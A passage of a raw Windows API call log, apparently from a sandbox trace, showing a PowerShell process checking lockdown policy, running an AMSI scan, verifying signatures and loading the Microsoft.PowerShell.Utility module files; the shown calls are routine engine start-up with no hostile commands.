(in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7dd9d8 | out: phkResult=0x1b7dd9d8*=0x6a0) returned 0x0 [0182.512] RegQueryValueExW (in: hKey=0x6a0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b7dda28, lpData=0x0, lpcbData=0x1b7dda20*=0x0 | out: lpType=0x1b7dda28*=0x0, lpData=0x0, lpcbData=0x1b7dda20*=0x0) returned 0x2 [0182.512] RegCloseKey (hKey=0x6a0) returned 0x0 [0182.512] CloseHandle (hObject=0x6cc) returned 1 [0182.513] CoCreateGuid (in: pguid=0x1b7ddb88 | out: pguid=0x1b7ddb88*(Data1=0x22c08375, Data2=0x9f9c, Data3=0x42bb, Data4=([0]=0xb4, [1]=0x15, [2]=0xe5, [3]=0x66, [4]=0xb9, [5]=0x3, [6]=0x83, [7]=0x94))) returned 0x0 [0182.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0182.521] AmsiOpenSession () returned 0x0 [0182.521] AmsiScanString () returned 0x80070015 [0182.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0182.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0182.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd550) returned 1 [0182.605] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7dd630 | out: lpFileInformation=0x1b7dd630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0182.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd510) returned 1 [0182.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0182.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dcf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0182.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dcff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0182.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd430) returned 1 [0182.606] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7dd510 | out: lpFileInformation=0x1b7dd510*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0182.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd3f0) returned 1 [0182.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dcee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0182.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd3c0) returned 1 [0182.606] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x688 [0182.606] GetFileType (hFile=0x688) returned 0x1 [0182.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd330) returned 1 [0182.606] GetFileType (hFile=0x688) returned 0x1 [0182.606] WTGetSignatureInfo () returned 0x0 [0182.860] CertDuplicateCertificateContext (pCertContext=0x1a8ac430) returned 0x1a8ac430 [0182.860] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7dd458 | out: phkResult=0x1b7dd458*=0x6d0) returned 0x0 [0182.860] RegQueryValueExW (in: hKey=0x6d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7dd4a8, lpData=0x0, lpcbData=0x1b7dd4a0*=0x0 | out: lpType=0x1b7dd4a8*=0x1, lpData=0x0, lpcbData=0x1b7dd4a0*=0x56) returned 0x0 [0182.860] RegQueryValueExW (in: hKey=0x6d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7dd4a8, lpData=0x24314f8, lpcbData=0x1b7dd4a0*=0x56 | out: lpType=0x1b7dd4a8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7dd4a0*=0x56) returned 0x0 [0182.860] RegCloseKey (hKey=0x6d0) returned 0x0 [0182.861] CoTaskMemAlloc (cb=0x10) returned 0x1a8e1e90 [0182.861] CoTaskMemAlloc (cb=0x50) returned 0x1a9b6960 [0182.861] WinVerifyTrust () returned 0x0 [0182.899] CoTaskMemFree (pv=0x1a9b6960) [0182.899] CoTaskMemFree (pv=0x1a8e1e90) [0182.899] CertFreeCertificateContext (pCertContext=0x1a8ac430) returned 1 [0182.899] CloseHandle (hObject=0x688) returned 1 [0182.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0182.905] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en-US\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en-us\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0182.906] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0182.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0182.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0182.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0182.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x1b7dc700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0182.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x105, lpBuffer=0x1b7dc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x63 [0182.937] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dcb90) returned 1 [0182.937] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x1b7dcc70 | out: lpFileInformation=0x1b7dcc70*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0182.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dcb50) returned 1 [0182.981] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0182.981] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0182.981] CoTaskMemAlloc (cb=0x20e) returned 0x1a9b1240 [0182.981] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1a9b1240, nSize=0x105 | out: lpBuffer="") returned 0x97 [0182.981] CoTaskMemFree (pv=0x1a9b1240) [0182.981] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dc510, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0182.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc950) returned 1 [0182.981] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7dca30 | out: lpFileInformation=0x1b7dca30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0182.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc910) returned 1 [0182.982] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0182.987] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dc510, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0182.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc950) returned 1 [0182.988] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7dca30 | out: lpFileInformation=0x1b7dca30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0182.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc910) returned 1 [0182.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0182.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc950) returned 1 [0182.988] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7dca30 | out: lpFileInformation=0x1b7dca30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0182.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc910) returned 1 [0182.988] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0x1b7dc370, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x50 [0182.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc7b0) returned 1 [0182.988] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x1b7dc890 | out: lpFileInformation=0x1b7dc890*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0182.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc770) returned 1 [0182.990] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0182.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0x1b7dc370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x58 [0182.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc7b0) returned 1 [0182.990] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x1b7dc890 | out: lpFileInformation=0x1b7dc890*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0182.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc770) returned 1 [0182.991] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0182.995] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")) returned 0x20 [0182.997] CoTaskMemAlloc (cb=0x20e) returned 0x1a9b1680 [0182.997] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1a9b1680, nSize=0x105 | out: lpBuffer="") returned 0x0 [0182.997] CoTaskMemFree (pv=0x1a9b1680) [0182.997] CoTaskMemAlloc (cb=0x20c) returned 0x1a9b09c0 [0182.997] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1a9b09c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0182.998] CoTaskMemFree (pv=0x1a9b09c0) [0182.998] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1b7dbc30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0182.998] GetCurrentProcess () returned 0xffffffffffffffff [0182.998] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7dc0e8 | out: TokenHandle=0x1b7dc0e8*=0x688) returned 1 [0182.998] GetTokenInformation (in: TokenHandle=0x688, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1b7dc1e8 | out: TokenInformation=0x0, ReturnLength=0x1b7dc1e8) returned 0 [0182.998] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1a8840f0 [0182.998] GetTokenInformation (in: TokenHandle=0x688, TokenInformationClass=0x1, TokenInformation=0x1a8840f0, TokenInformationLength=0x2c, ReturnLength=0x1b7dc1e8 | out: TokenInformation=0x1a8840f0, ReturnLength=0x1b7dc1e8) returned 1 [0182.998] LocalFree (hMem=0x1a8840f0) returned 0x0 [0182.999] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x2490650, cbSid=0x1b7dc1e0 | out: pSid=0x2490650*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x1b7dc1e0) returned 1 [0182.999] CreateMutexW (lpMutexAttributes=0x24907a0, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x698 [0182.999] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b7dc080*=0x698, lpdwindex=0x1b7dbe54 | out: lpdwindex=0x1b7dbe54) returned 0x0 [0182.999] CoTaskMemAlloc (cb=0x20e) returned 0x1a9aee20 [0182.999] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1a9aee20, nSize=0x105 | out: lpBuffer="") returned 0x0 [0182.999] CoTaskMemFree (pv=0x1a9aee20) [0183.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7dbd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0183.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc1d0) returned 1 [0183.000] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x2490e38 | out: lpFileInformation=0x2490e38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0183.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc190) returned 1 [0183.000] ReleaseMutex (hMutex=0x698) returned 1 [0183.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7dbba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0183.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc080) returned 1 [0183.000] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6a8 [0183.000] GetFileType (hFile=0x6a8) returned 0x1 [0183.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dbff0) returned 1 [0183.000] GetFileType (hFile=0x6a8) returned 0x1 [0183.001] ReadFile (in: hFile=0x6a8, lpBuffer=0x2492190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dc158, lpOverlapped=0x0 | out: lpBuffer=0x2492190*, lpNumberOfBytesRead=0x1b7dc158*=0x1000, lpOverlapped=0x0) returned 1 [0183.003] ReadFile (in: hFile=0x6a8, lpBuffer=0x2492190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dc158, lpOverlapped=0x0 | out: lpBuffer=0x2492190*, lpNumberOfBytesRead=0x1b7dc158*=0x1000, lpOverlapped=0x0) returned 1 [0183.003] ReadFile (in: hFile=0x6a8, lpBuffer=0x2492190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dc158, lpOverlapped=0x0 | out: lpBuffer=0x2492190*, lpNumberOfBytesRead=0x1b7dc158*=0x1000, lpOverlapped=0x0) returned 1 [0183.004] ReadFile (in: hFile=0x6a8, lpBuffer=0x2492190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dc158, lpOverlapped=0x0 | out: lpBuffer=0x2492190*, lpNumberOfBytesRead=0x1b7dc158*=0x1000, lpOverlapped=0x0) returned 1 [0183.004] ReadFile (in: hFile=0x6a8, lpBuffer=0x2492190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dc158, lpOverlapped=0x0 | out: lpBuffer=0x2492190*, lpNumberOfBytesRead=0x1b7dc158*=0x1000, lpOverlapped=0x0) returned 1 [0183.004] ReadFile (in: hFile=0x6a8, lpBuffer=0x2492190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dc158, lpOverlapped=0x0 | out: lpBuffer=0x2492190*, lpNumberOfBytesRead=0x1b7dc158*=0x298, lpOverlapped=0x0) returned 1 [0183.004] ReadFile (in: hFile=0x6a8, lpBuffer=0x2492190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dc158, lpOverlapped=0x0 | out: lpBuffer=0x2492190*, lpNumberOfBytesRead=0x1b7dc158*=0x0, lpOverlapped=0x0) returned 1 [0183.004] CloseHandle (hObject=0x6a8) returned 1 [0183.568] CoTaskMemAlloc (cb=0x20c) returned 0x1a9af8c0 [0183.568] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1a9af8c0 | out: 